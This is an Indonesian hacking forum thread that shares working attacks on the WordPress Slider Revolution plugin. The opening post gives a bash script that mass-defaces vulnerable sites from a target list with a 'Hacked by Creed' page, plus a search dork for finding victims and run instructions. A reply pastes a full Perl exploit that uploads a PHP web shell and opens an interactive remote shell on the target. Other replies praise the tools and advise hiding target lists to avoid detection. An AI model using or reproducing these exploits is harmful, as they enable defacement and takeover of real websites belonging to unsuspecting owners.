[Share] [BASH] Revslider Exploit Wordpress
#1
Kali ini saya akan share bot Revslider yang dibuat oleh Index Php, udah ane cek kok semoga aja gak double post.

[Image: Screenshot_4.png]

Bot ini berekstensi bash, orang2 banyak mengatakan Program Shell Linux, dari namanya saja bash ( Bourneo Again Shell ) .
Bash ini hanya bisa dijalankan Oleh OS Linux dan saudaranya saja.

Pertama simpan file bash ini

Code:
#!/bin/bash
#coded = IBT
SS(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "client_action=update_captions_css" \
-F "action=revslider_ajax_action" \
-F "data=x$(cat tmp/s.txt)" \
--request POST "http://${1}/wp-admin/admin-ajax.php"
}
CD(){
if [ -f tmp/cd.txt ];then
rm -f tmp/cd.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
cat tmp/cd.txt | grep -i "Creed" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success"
echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt
else
echo "--> $urlnya : exploit failed"
fi
}
CV(){
if [ -f tmp/cv.txt ];then
rm -f tmp/cv.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt
if [ ! -f tmp/cv.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
cat tmp/cv.txt | grep "wrong ajax action:" > /dev/null;cv=$?
if [ $cv -eq 1 ];then
echo "--> $urlnya : not vuln"
continue
else
echo "--> $urlnya : found revslider"
fi
}
Exp(){
for url in `cat $list`
do
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
if [ ! -f load.txt ];then
touch load.txt
fi
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
#udah pernah di load di file load.txt
#kalau mau load ulang,silakan hapus file load.txt
continue
fi
echo "--> $urlnya : check"
CV $urlnya
SS $urlnya
CD $urlnya
done
}
Lengkap(){
if [ ! -f $list ];then
echo "[!] $list not exist"
exit
fi
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f tmp/s.txt ];then
cat > tmp/s.txt <<_script
<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by Creed<p style='color: transparent'>
_script
fi
Exp
}
read -p "[+] Enter list target = " list
Lengkap

Ganti Nick Creed dengan nama anda.
save bash dengan rev.sh

lalu buat list targetnya disini ane mempunyai 5 target cara mencari targetnya dengan dork ini
wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
simpan list target anda , save dengan nama target.txt

kalau sudah disave dan dijalankan error bash nya di dos2dulu dengan perintah ini

dos2unix rev.sh

dan centang permission executenya seperti ini

[Image: Screenshot_3.png]

apabila sudah tidak error jalan kan bashnya kembali buka terminal ketik bash rev.sh lalu isi target.txt

[Image: Screenshot_8.png]

kalau succes berarti anda berhasil, semoga tutorial sederhana ini berguna bro.. dan semoga jga dapet free email hehe Big Grin

#2
mantap Smile
thanks udah berbagi bro.. BTW itu target.txt nya di sensor dulu biar ga kena tusbol Big Grin

#3
[Image: 214cfh0.png]

syukur deh gak vuln.. Big Grin tpi klo pake wpscan ada sih vulnnya...
daripada orang yg lain yg nemuin.. Smile
Read.. Read.. And Read again..!!

#4
mantab dah,om..
nambah ilmu lagi saya. Big Grin







#5
(05-14-2015, 03:10 PM)drewcode Wrote: mantap Smile
thanks udah berbagi bro..  BTW itu target.txt nya di sensor dulu biar ga kena tusbol Big Grin

Iya sama2 om, salam kenal om Big Grin
Aduh iya lupa ane blur...

#6
(05-14-2015, 03:13 PM)bintanGelap19 Wrote: [Image: 214cfh0.png]

syukur deh gak vuln.. Big Grin tpi klo pake wpscan ada sih vulnnya...
daripada orang yg lain yg nemuin.. Smile

yang benar om pake wpscan ada vulnnya? setau ane ini pake phpbb Smile

#7
(05-14-2015, 04:30 PM)Devonz Wrote: mantab dah,om..
nambah ilmu lagi saya. Big Grin

semoga tutor sederhana ini berguna om, owh ya salam kenal om.

#8
@Creed : nice share om , ane punyanya yang pake perl , dari author aslinya
http://www.morxploit.com/morxploits/morxrevbiz.pl
Spoiler! :

Code:
#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Updated: 25 November 2014
# Published: 25 November 2014
# MorXploit Research
# http://www.MorXploit.com
# Vendor: ThemePunch
# Vendor url: http://themepunch.com
# Software: Revslider/Showbiz Pro
# Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
# Products url:
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
# Vulnerable scripts:
# revslider/revslider_admin.php
# showbiz/showbiz_admin.php
#
# About the plugins:
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
# kind of content whith highly customizable, transitions, effects and custom animations.
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
# amount of teaser items.
#
# Description:
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
# attacker to abuse administrative features.
# Some of the features include:
# Creating/Deleting/Updating sliders
# Importing/exporting sliders
# Updading plugin
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
#
# PoC on revslider:
# 1- Deleting a slider:
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
# http://****.com/wp-admin/admin-ajax.php
# * Connected to ****.com (**.**.**.**) port 80 (#0)
# > POST /wp-admin/admin-ajax.php HTTP/1.1
# > User-Agent: curl/7.35.0
# > Host: ****.com
# > Accept: */*
# > Content-Length: 73
# > Content-Type: application/x-www-form-urlencoded
# >
# * upload completely sent off: 73 out of 73 bytes
# < HTTP/1.1 200 OK
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
# < X-Powered-By: PHP/5.4.18
# < X-Robots-Tag: noindex
# < X-Content-Type-Options: nosniff
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
# < Cache-Control: no-cache, must-revalidate, max-age=0
# < Pragma: no-cache
# < X-Frame-Options: SAMEORIGIN
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
# < Transfer-Encoding: chunked
# < Content-Type: text/html; charset=UTF-8
# <
# * Connection #0 to host http://****.com left intact
#
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
#
# 2- Uploading an web shell:
# The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
# To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
# and save them it in the same directory where you have the exploit.
#
# Demo:
# perl morxrev.pl http://localhost revslider
# ===================================================
# --- Revslider/Showbiz shell upload exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Target set to revslider
# [*] MorXploiting http://localhost
# [*] Sent payload
# [+] Payload successfully executed
# [*] Checking if shell was uploaded
# [+] Shell successfully uploaded
#
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
#
# www-data@MorXploit:~$
#
# Download:
# Exploit:
# http://www.morxploit.com/morxploits/morxrevbiz.pl
# Exploit update zip files:
# http://www.morxploit.com/morxploits/revslider.zip
# http://www.morxploit.com/morxploits/showbiz.zip
#
# Requires LWP::UserAgent
# apt-get install libwww-perl
# yum install libwww-perl
# perl -MCPAN -e 'install Bundle::LWP'
# For SSL support:
# apt-get install liblwp-protocol-https-perl
# yum install perl-Crypt-SSLeay
#
# Mitigation:
# Besides the recently LFI vulnerability that was published couple months ago, this is another vulnerability that revslider developers have
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
# latest version (=> 3.0.96) vulnerable to this nasty flaw, revsliders developers will argue the fact that their slider comes with an
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes users may not get
# plugin updates or will have to pay to get the update. In other words revslider developers believe that every user should have the
# auto-update feature on, otherwise ... you are screwed.
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
# as well as the ability to dump the entire wordpress database locally.
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
# As for Showbiz Pro, sadly the vulnerability has never been patched as we successfully exploited it in the latest version (1.7.1).
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
#
# Got comments or questions?
# Simo_at_MorXploit_dot_com
#
# Did you like this exploit?
# Feel free to buy me a beer =)
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
# Cheers!

use LWP::UserAgent;
use MIME::Base64;
use strict;

sub banner {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "===================================================\n";
print "--- Revslider/Showbiz shell upload exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
}

if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}

my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";

unless (-e ($zip1 && $zip2))
{
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}

my $host = $ARGV[0];
my $plugin = $ARGV[1];
my $action;
my $update_file;

if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
my $target = "wp-admin/admin-ajax.php";
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";

sub randomagent {
my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
);
my $random = $array[rand @array];
return($random);
}
my $useragent = randomagent();

my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}

elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}

elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}

else {
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}

print "[*] Checking if shell was uploaded\n";

sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}

elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);

while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}


#9
(05-15-2015, 09:19 AM)abdilahrf Wrote: @Creed : nice share om , ane punyanya yang pake perl , dari author aslinya
http://www.morxploit.com/morxploits/morxrevbiz.pl
[*]

wah terimakasih banyak nii om udah ditambahin.. salam kenal ya om Smile
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#10
wihh makasih om shareannya

kalo boleh tau ini cara kerja exploitnya gmn ya ? oiya itu kan write cssnya kalo misalkan mau write file yang php gimana mas ?






Users browsing this thread: 1 Guest(s)